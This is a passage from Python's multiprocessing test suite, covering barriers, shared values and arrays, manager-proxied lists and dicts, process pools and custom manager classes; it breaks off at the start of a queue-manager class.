self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
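# Illustration only (not executed by the tests): the class above behaves like
# a process-safe counter -- append() increments it and len() reads it.
#
#     counter = _DummyList()
#     counter.append(True)      # the appended value itself is discarded
#     assert len(counter) == 1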
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
    def run_threads(self, f, args):
        # Run f in self.N-1 child processes/threads (via Bunch) plus once in
        # the current process, then wait for all of them to finish.
        b = Bunch(self, f, args, self.N-1)
        try:
            f(*args)
            b.wait_for_finished()
        finally:
            b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
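    # Each codes_values entry below is (typecode, value set by the parent,
    # value that the child process writes back in _test()).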
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
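# The megabyte-sized error message above is deliberate: test_map_no_failfast()
# below relies on the pickled exception being large enough to fill the
# result queue.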
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
        # With a process pool, copies of the objects are returned; check
        # that they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
    # Returning a lambda makes the result unpicklable, so encoding it in the
    # worker fails with MaybeEncodingError.
    return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
        # test cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
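# Only '__next__' is exposed, so iterating the proxy forwards each __next__()
# call to the generator living in the manager process.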
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
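# Sketch of how the customized manager is used (mirrors common() below):
#
#     with MyManager() as manager:
#         foo = manager.Foo()      # proxy around a FooBar instance
#         foo.f()                  # -> 'f()'
#         list(manager.baz())      # iterates via IteratorProxy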
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
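# Every client that calls get_queue() through the manager gets a proxy to
# this single module-level queue living in the server process.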
class QueueManager(BaseManager):
'''manager class used by server process'''
